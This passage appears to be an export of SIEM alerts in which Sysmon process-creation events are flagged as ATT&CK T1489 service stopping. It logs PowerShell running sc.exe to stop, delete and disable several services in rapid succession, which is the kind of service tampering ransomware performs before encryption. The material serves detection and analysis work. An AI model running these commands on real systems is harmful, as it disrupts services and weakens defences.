""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.360224900Z"",""eventRecordID"":""2662"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.357\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-00103e132100}\r\nProcessId: 5196\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.357"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-00103e132100}"",""processId"":""5196"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.590",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.303 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010bf102100} +ProcessId: 3880 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.304832600Z"",""eventRecordID"":""2659"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.303\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010bf102100}\r\nProcessId: 3880\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.303"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010bf102100}"",""processId"":""3880"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.557",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.270 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010270f2100} +ProcessId: 3812 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.272524300Z"",""eventRecordID"":""2657"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.270\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010270f2100}\r\nProcessId: 3812\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.270"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010270f2100}"",""processId"":""3812"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.547",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.252 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010480e2100} +ProcessId: 6132 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.255066300Z"",""eventRecordID"":""2656"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.252\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010480e2100}\r\nProcessId: 6132\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.252"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010480e2100}"",""processId"":""6132"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.470",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.199 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010eb0b2100} +ProcessId: 6072 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.201724700Z"",""eventRecordID"":""2653"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.199\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010eb0b2100}\r\nProcessId: 6072\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.199"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010eb0b2100}"",""processId"":""6072"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.417",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.148 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-00107a092100} +ProcessId: 7116 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.150824300Z"",""eventRecordID"":""2650"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.148\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-00107a092100}\r\nProcessId: 7116\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.148"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-00107a092100}"",""processId"":""7116"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.404",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.133 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010b0082100} +ProcessId: 1144 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Nationalmll Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Nationalmll Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.135527000Z"",""eventRecordID"":""2649"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.133\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010b0082100}\r\nProcessId: 1144\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Nationalmll Start= 